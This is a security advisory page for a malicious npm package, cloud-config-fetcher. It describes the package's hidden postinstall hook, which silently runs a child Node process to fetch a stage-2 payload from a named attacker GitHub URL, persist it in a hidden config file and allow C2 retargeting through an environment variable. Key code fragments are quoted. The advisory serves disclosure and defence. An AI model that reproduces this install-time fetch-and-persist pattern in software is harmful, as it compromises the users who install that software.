VDB

GCVE-110-OSM-2026-3256

GCVE-110-OSM-2026-3256
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published April 28, 2026
Downloads and persists a stage-2 payload silently at install time: the postinstall hook spawns a child Node.js process (stdio: 'ignore') that fetches JSON from an attacker-controlled GitHub repository (smi1e2u/smart-config-manager) and writes it to ~/.config/cloud-config/.cloud-preferences.json. The C2 URL is overridable via the CLOUD_CONFIG_DEFAULT_URL environment variable for operator retargeting. Published as 4 versions in 74 minutes with no git provenance. **Trigger** (postinstall): `node -e require('.')` causes index.js auto-init block to run at install time. **Stage-2 fetch**: `child_process.execFileSync(process.execPath, ['-e', _fetchScript], {stdio: 'ignore'})` fetches `https://raw.githubusercontent.com/smi1e2u/smart-config-manager/main/defaults/preferences.json`. **Persistence**: Payload written to ~/.config/cloud-config/.cloud-preferences.json (Linux/macOS) or %APPDATA%/cloud-config/.cloud-preferences.json (Windows). **C2 retargeting**: CLOUD_CONFIG_DEFAULT_URL env var overrides the default URL.

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowncloud-config-fetcher1.0.2 (affected)

Browse GCVE Records

73,393 records in the GCVE database · Updated July 17, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›